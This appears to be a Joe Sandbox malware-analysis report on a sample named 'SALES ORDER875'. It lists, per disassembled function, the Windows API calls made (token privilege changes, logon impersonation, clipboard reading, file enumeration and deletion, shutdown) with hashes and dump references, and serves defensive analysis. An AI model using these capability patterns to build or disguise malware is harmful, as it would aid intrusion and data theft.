                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                                                    • API String ID: 4125248594-2988720461
                                                                                                                                                                                    • Opcode ID: 69fee7ffda08ba5f0ba0bdd59511a74ea853b7cf642ee008b0460a6d10541577
                                                                                                                                                                                    • Instruction ID: 41bb54f23d36109b8296cd63b0efc0e6a62531cba1a5b5070001ba15bd367efb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 69fee7ffda08ba5f0ba0bdd59511a74ea853b7cf642ee008b0460a6d10541577
                                                                                                                                                                                    • Instruction Fuzzy Hash: 00316572B80318BFEB216BB56C89FBF7E6DEB44B50F114036F601E61D1C6B05D00AA64
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 003E16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003E170D
                                                                                                                                                                                      • Part of subcall function 003E16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003E173A
                                                                                                                                                                                      • Part of subcall function 003E16C3: GetLastError.KERNEL32 ref: 003E174A
                                                                                                                                                                                    • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 003E1286
                                                                                                                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 003E12A8
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 003E12B9
                                                                                                                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003E12D1
                                                                                                                                                                                    • GetProcessWindowStation.USER32 ref: 003E12EA
                                                                                                                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 003E12F4
                                                                                                                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 003E1310
                                                                                                                                                                                      • Part of subcall function 003E10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003E11FC), ref: 003E10D4
                                                                                                                                                                                      • Part of subcall function 003E10BF: CloseHandle.KERNEL32(?,?,003E11FC), ref: 003E10E9
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                    • String ID: $default$winsta0$ZD
                                                                                                                                                                                    • API String ID: 22674027-2189136405
                                                                                                                                                                                    • Opcode ID: 0c599dcd15c85ae446080ef4a910bddc7a1f0f29b33886d08410a1c860a586fe
                                                                                                                                                                                    • Instruction ID: 9f2ed16d91f64f8a60656c5a2ad88477580431c2c11fbb6af1b045cfc5a0cac9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c599dcd15c85ae446080ef4a910bddc7a1f0f29b33886d08410a1c860a586fe
                                                                                                                                                                                    • Instruction Fuzzy Hash: 19819071940299AFDF129FA6DC49FEE7BB9EF04704F148229F911A62E0C7758944CF24
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 003E10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 003E1114
                                                                                                                                                                                      • Part of subcall function 003E10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,003E0B9B,?,?,?), ref: 003E1120
                                                                                                                                                                                      • Part of subcall function 003E10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,003E0B9B,?,?,?), ref: 003E112F
                                                                                                                                                                                      • Part of subcall function 003E10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,003E0B9B,?,?,?), ref: 003E1136
                                                                                                                                                                                      • Part of subcall function 003E10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 003E114D
                                                                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 003E0BCC
                                                                                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 003E0C00
                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 003E0C17
                                                                                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 003E0C51
                                                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003E0C6D
                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 003E0C84
                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 003E0C8C
                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 003E0C93
                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 003E0CB4
                                                                                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 003E0CBB
                                                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 003E0CEA
                                                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003E0D0C
                                                                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 003E0D1E
                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E0D45
                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 003E0D4C
                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E0D55
                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 003E0D5C
                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E0D65
                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 003E0D6C
                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 003E0D78
                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 003E0D7F
                                                                                                                                                                                      • Part of subcall function 003E1193: GetProcessHeap.KERNEL32(00000008,003E0BB1,?,00000000,?,003E0BB1,?), ref: 003E11A1
                                                                                                                                                                                      • Part of subcall function 003E1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,003E0BB1,?), ref: 003E11A8
                                                                                                                                                                                      • Part of subcall function 003E1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,003E0BB1,?), ref: 003E11B7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4175595110-0
                                                                                                                                                                                    • Opcode ID: 8c285d23327c632ab7475a3fe910a72063bc52fd7efce2d0b7da753798e7b9c4
                                                                                                                                                                                    • Instruction ID: 648130c4c4f7365b3a879045b5e4a05347dfd92ed46b137e909387f3c61d019a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c285d23327c632ab7475a3fe910a72063bc52fd7efce2d0b7da753798e7b9c4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E719C7294025AEBDF11DFE5DC84BEFBBB8FF08300F158225E914A6191D7B4AA45CB60
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • OpenClipboard.USER32(0041CC08), ref: 003FEB29
                                                                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 003FEB37
                                                                                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 003FEB43
                                                                                                                                                                                    • CloseClipboard.USER32 ref: 003FEB4F
                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 003FEB87
                                                                                                                                                                                    • CloseClipboard.USER32 ref: 003FEB91
                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 003FEBBC
                                                                                                                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 003FEBC9
                                                                                                                                                                                    • GetClipboardData.USER32(00000001), ref: 003FEBD1
                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 003FEBE2
                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 003FEC22
                                                                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 003FEC38
                                                                                                                                                                                    • GetClipboardData.USER32(0000000F), ref: 003FEC44
                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 003FEC55
                                                                                                                                                                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 003FEC77
                                                                                                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 003FEC94
                                                                                                                                                                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 003FECD2
                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 003FECF3
                                                                                                                                                                                    • CountClipboardFormats.USER32 ref: 003FED14
                                                                                                                                                                                    • CloseClipboard.USER32 ref: 003FED59
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 420908878-0
                                                                                                                                                                                    • Opcode ID: 607d3758c1722515bd04dfcb98b1c0d5ef2e8dcca724b2ad2926a15ce61e05c2
                                                                                                                                                                                    • Instruction ID: a39b2088ba1a31940daa4cb5542e83904ac25bdca3e38c99019bdf88830038c7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 607d3758c1722515bd04dfcb98b1c0d5ef2e8dcca724b2ad2926a15ce61e05c2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A61BE352483059FD302EF24CC85F7A77A8AF84704F1585ADF5969B2A2DB31DD05CB62
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 003F69BE
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 003F6A12
                                                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003F6A4E
                                                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003F6A75
                                                                                                                                                                                      • Part of subcall function 00389CB3: _wcslen.LIBCMT ref: 00389CBD
                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 003F6AB2
                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 003F6ADF
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                    • API String ID: 3830820486-3289030164
                                                                                                                                                                                    • Opcode ID: cf12f24fab4872a3be9abc5f8968b2c295a5cfaf5f6aad8057ce2c62f1fb7e66
                                                                                                                                                                                    • Instruction ID: 1ae95fff4046999654fb7b7c8bd1a1a675427676b4328e32957a6824c413db25
                                                                                                                                                                                    • Opcode Fuzzy Hash: cf12f24fab4872a3be9abc5f8968b2c295a5cfaf5f6aad8057ce2c62f1fb7e66
                                                                                                                                                                                    • Instruction Fuzzy Hash: 00D172B2508304AFC711EBA4C982EBBB7ECAF98704F04495DF585DB191EB74DA44C762
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 003F9663
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 003F96A1
                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 003F96BB
                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 003F96D3
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 003F96DE
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 003F96FA
                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 003F974A
                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00446B7C), ref: 003F9768
                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 003F9772
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 003F977F
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 003F978F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                    • API String ID: 1409584000-438819550
                                                                                                                                                                                    • Opcode ID: 14f5b8745c4c84d403f8d4bf798a71a87ae5446de389710827e86db1d7b493ef
                                                                                                                                                                                    • Instruction ID: 5042b4c5e946e94a55c0e96347084f23f34b54e666a90ad83fe08c7b861f4047
                                                                                                                                                                                    • Opcode Fuzzy Hash: 14f5b8745c4c84d403f8d4bf798a71a87ae5446de389710827e86db1d7b493ef
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1331B33254021D6BDB16AFB4DC49BEE77ACDF09321F1181A7FA15E20A0EB74DD448A58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 003F97BE
                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 003F9819
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 003F9824
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 003F9840
                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 003F9890
                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00446B7C), ref: 003F98AE
                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 003F98B8
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 003F98C5
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 003F98D5
                                                                                                                                                                                      • Part of subcall function 003EDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003EDB00
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                    • API String ID: 2640511053-438819550
                                                                                                                                                                                    • Opcode ID: ccf8a3f2d817dd5fdabca1c8ba89cfc61cc369733192018c151edc654d056065
                                                                                                                                                                                    • Instruction ID: 3020800609d6fd89f6440b536239dd668f17311f93a6171ef003d9bc48bb0704
                                                                                                                                                                                    • Opcode Fuzzy Hash: ccf8a3f2d817dd5fdabca1c8ba89cfc61cc369733192018c151edc654d056065
                                                                                                                                                                                    • Instruction Fuzzy Hash: D031D43254021D6ADB12EFB4DC48BEE77ACDF06360F1181A7F910A2190DB70DE84CA64
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 003F8257
                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 003F8267
                                                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003F8273
                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003F8310
                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 003F8324
                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 003F8356
                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 003F838C
                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 003F8395
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                                    • API String ID: 1464919966-438819550
                                                                                                                                                                                    • Opcode ID: 9bbb29c0ab6a4fb656149eec345258776f48397b78032731d8bb317e6e5f0a9b
                                                                                                                                                                                    • Instruction ID: ab637fb6adf87ad63f31f5e2832a4243be685f1813c48519b2f80f5fd2765a42
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9bbb29c0ab6a4fb656149eec345258776f48397b78032731d8bb317e6e5f0a9b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C618D765043499FC715EF60C8409AFB3E8FF89310F04896EFA998B251DB31E945CB92
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00383AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00383A97,?,?,00382E7F,?,?,?,00000000), ref: 00383AC2
                                                                                                                                                                                      • Part of subcall function 003EE199: GetFileAttributesW.KERNEL32(?,003ECF95), ref: 003EE19A
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 003ED122
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 003ED1DD
                                                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 003ED1F0
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 003ED20D
                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 003ED237
                                                                                                                                                                                      • Part of subcall function 003ED29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,003ED21C,?,?), ref: 003ED2B2
                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 003ED253
                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 003ED264
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                    • API String ID: 1946585618-1173974218
                                                                                                                                                                                    • Opcode ID: 9825b94924f143109a121c1b1ba8c8d11e7c0563f9d0f1fc4903ccd209040352
                                                                                                                                                                                    • Instruction ID: d3635acde9bf93795b9af58e516455f3ff2bf1745f0b1a366c84be9b72af09b6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9825b94924f143109a121c1b1ba8c8d11e7c0563f9d0f1fc4903ccd209040352
                                                                                                                                                                                    • Instruction Fuzzy Hash: CA613B3180525D9BCF06FBE1CA929FDB775AF15300F2486A5E4027B191EB31AF09CB61
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1737998785-0
                                                                                                                                                                                    • Opcode ID: 9ae03703118faf6b44bd56b7c96bc90911a9af171236e038a9117d73d6b02053
                                                                                                                                                                                    • Instruction ID: c715a3cde9b9ab82ebae52b09c9c7aa2f446b090b3128a62f3d8b8071a32fc1d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ae03703118faf6b44bd56b7c96bc90911a9af171236e038a9117d73d6b02053
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0441CB31604211EFE322DF15E888B6ABBE5EF44328F15C0A9E5598FA72C735EC41CB90
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 003E16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003E170D
                                                                                                                                                                                      • Part of subcall function 003E16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003E173A
                                                                                                                                                                                      • Part of subcall function 003E16C3: GetLastError.KERNEL32 ref: 003E174A
                                                                                                                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 003EE932
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
